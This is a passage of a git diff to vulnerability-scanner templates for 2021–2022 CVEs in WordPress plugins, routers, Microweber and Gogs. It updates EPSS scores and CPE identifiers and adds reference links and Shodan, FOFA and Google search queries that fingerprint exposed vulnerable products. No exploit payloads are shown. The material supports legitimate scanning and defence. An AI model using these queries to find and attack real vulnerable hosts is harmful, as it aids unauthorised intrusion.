cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50055 + epss-percentile: 0.50094 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"car rental management system" + fofa-query: body="car rental management system" tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project http: diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 782178a556..15b04806cc 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -15,13 +15,14 @@ info: - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46069 + - https://github.com/plsanu/CVE-2021-46069 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46069 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34831 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index 39c93d4807..18308c9d1e 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -15,13 +15,14 @@ info: - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46071 + - https://github.com/zecool/cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46071 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34831 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 09844bf438..5990bc2b0f 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46072 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34354 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index d29f497bea..dae8fc9b3a 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -31,6 +31,7 @@ info: product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" + google-query: intitle:"ligeo" tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives http: diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 0595060487..bde0d4f672 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -20,13 +20,13 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.02202 - epss-percentile: 0.892 - cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* + epss-score: 0.02555 + epss-percentile: 0.90197 + cpe: cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink - product: dap-1620_firmware + product: dap-1620 tags: cve2021,cve,lfi,router,packetstorm,dlink http: diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 482e8a17b5..8e74158ab1 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 - epss-score: 0.00628 - epss-percentile: 0.76726 + epss-score: 0.09016 + epss-percentile: 0.94598 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware shodan-query: http.title:"Zywall2Plus" + fofa-query: title="zywall2plus" + google-query: intitle:"zywall2plus" tags: cve2021,cve,xss,zyxel,edb http: diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 2751a88c00..850d47644c 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 - epss-score: 0.70988 - epss-percentile: 0.97776 + epss-score: 0.64772 + epss-percentile: 0.97891 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: franklinfueling product: colibri_firmware shodan-query: http.html:"Franklin Fueling Systems" + fofa-query: body="franklin fueling systems" tags: cve2021,cve,packetstorm,franklinfueling,lfi http: diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 5d23fb79d8..15773d33ff 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -14,17 +14,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-46418 - epss-score: 0.0528 - epss-percentile: 0.92891 - cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* + epss-score: 0.07418 + epss-percentile: 0.94089 + cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: telesquare - product: tlr-2855ks6_firmware + product: tlr-2855ks6 fofa-query: product=="TELESQUARE-TLR-2855KS6" tags: packetstorm,cve,cve2021,telesquare,intrusive - variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index e8bcf54405..c539c1ff19 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-46419 - epss-score: 0.31802 - epss-percentile: 0.96898 + epss-score: 0.36968 + epss-percentile: 0.97176 cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true @@ -24,8 +24,8 @@ info: product: tlr-2855ks6_firmware shodan-query: title:"Login to TLR-2855KS6" fofa-query: product=="TELESQUARE-TLR-2855KS6" + google-query: intitle:"login to tlr-2855ks6" tags: packetstorm,cve,cve2021,telesquare,intrusive - variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index d224356762..3b3bfe8dce 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46422 cwe-id: CWE-78 - epss-score: 0.95567 - epss-percentile: 0.99348 - cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* + epss-score: 0.95843 + epss-percentile: 0.99441 + cpe: cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: telesquare - product: sdt-cs3b1_firmware + product: sdt-cs3b1 shodan-query: html:"SDT-CW3B1" tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb variables: diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 526ea1ebc4..f1d576e1e3 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -29,6 +29,7 @@ info: vendor: telesquare product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" + fofa-query: body="tlr-2005ksh" tags: cve2021,cve,telesquare,intrusive,packetstorm http: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 11389d38bf..e88a259ec2 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -30,6 +30,7 @@ info: vendor: genieacs product: genieacs shodan-query: http.favicon.hash:-2098066288 + fofa-query: body="genieacs" tags: cve2021,cve,genieacs,rce http: diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 9ae73afa81..92add31637 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0087 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 65bb8f39b3..250c628b96 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-gdpr-compliance/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0147 - https://plugins.trac.wordpress.org/changeset/2681371 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40832 + epss-percentile: 0.41295 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index ae65b6dbeb..baf2ef667d 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50222 + epss-percentile: 0.50194 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 136a815fff..c1dcb36456 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index a257a7ebed..be44aac08e 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 74acb94b6e..ea16ab5493 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -29,6 +29,8 @@ info: product: photo_gallery framework: wordpress publicwww-query: "/wp-content/plugins/photo-gallery" + shodan-query: http.html:/wp-content/plugins/photo-gallery + fofa-query: body=/wp-content/plugins/photo-gallery tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index e19759eb49..4264c1b1e0 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index cba1594814..9545abdff7 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 8e92196ddc..f78d344d6d 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 4c16cd61d4..81611ca0d5 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0228 cwe-id: CWE-89 epss-score: 0.03069 - epss-percentile: 0.90788 + epss-percentile: 0.91002 cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: popup_builder framework: wordpress publicwww-query: /wp-content/plugins/popup-builder/ + shodan-query: http.html:/wp-content/plugins/popup-builder/ + fofa-query: body=/wp-content/plugins/popup-builder/ tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 21c12d3822..57e9ca5b7f 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0234 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 825e258e1e..b88cba58cd 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -22,13 +22,16 @@ info: cve-id: CVE-2022-0271 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: thimpress product: learnpress framework: wordpress + publicwww-query: /wp-content/plugins/learnpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress http: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index d8722dcaad..6ae3015b86 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -28,6 +28,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,disclosure,huntr http: diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 6fe7c560eb..fb165f0490 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 88cfcbcf2a..bb1d52c6c2 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0342 cwe-id: CWE-287 epss-score: 0.08015 - epss-percentile: 0.94132 + epss-percentile: 0.94281 cpe: cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 4073e55fe7..c2b6fe27f2 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.02414 - epss-percentile: 0.89687 + epss-percentile: 0.89914 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 415dc9f2b2..3125532a71 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 58ade967dc..f4219bef5e 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -13,19 +13,24 @@ info: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902 - https://nvd.nist.gov/vuln/detail/CVE-2022-0415 + - https://github.com/bfengj/CTF + - https://github.com/cokeBeer/go-cves classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 cwe-id: CWE-434,CWE-20 - epss-score: 0.1488 - epss-percentile: 0.95273 + epss-score: 0.11758 + epss-percentile: 0.95304 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 75d7077c97..257ba52f18 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 4dcbc3f1da..1af717e2a6 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -25,6 +25,8 @@ info: product: popup framework: wordpress publicwww-query: "/wp-content/plugins/popup-by-supsystic" + shodan-query: http.html:/wp-content/plugins/popup-by-supsystic + fofa-query: body=/wp-content/plugins/popup-by-supsystic tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup http: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 3d5c34a880..67424235b5 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 8e17d66054..1ef77cc8fc 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0434 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.90796 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 4afa2716a7..0990ac2f81 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0533 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: ditty framework: wordpress publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ + fofa-query: body=/wp-content/plugins/ditty-news-ticker/ tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations http: diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 43550a1baa..73e28bd17a 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0597 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.45025 + epss-percentile: 0.45018 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,microweber,redirect,oss http: diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 52049ee911..64051604c8 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index aa5b02be47..2535aa5cd5 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0651 cwe-id: CWE-89 - epss-score: 0.34697 - epss-percentile: 0.96721 + epss-score: 0.26955 + epss-percentile: 0.96764 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,9 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 93b3090e9e..4c48aa7965 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0653 cwe-id: CWE-79 epss-score: 0.00206 - epss-percentile: 0.58596 + epss-percentile: 0.58565 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 62d781c125..e985446a6a 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-0656 cwe-id: CWE-552 - epss-score: 0.00684 - epss-percentile: 0.77939 + epss-score: 0.00658 + epss-percentile: 0.79479 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 49fdf094e6..d9e1a4f4a5 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0658 cwe-id: CWE-89 epss-score: 0.04032 - epss-percentile: 0.91879 + epss-percentile: 0.92073 cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 03acf180ab..f465933e02 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -29,6 +29,8 @@ info: max-request: 2 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,disclosure,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 4051acee76..1bdae5b3d5 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0678 cwe-id: CWE-79 epss-score: 0.00138 - epss-percentile: 0.48373 + epss-percentile: 0.49247 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index f97e9ea796..6907b96a3e 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0692 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 0b20732236..8d2bd3a882 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 - epss-score: 0.02977 - epss-percentile: 0.89892 + epss-score: 0.02367 + epss-percentile: 0.89814 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 77a0f51995..63d351902a 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ 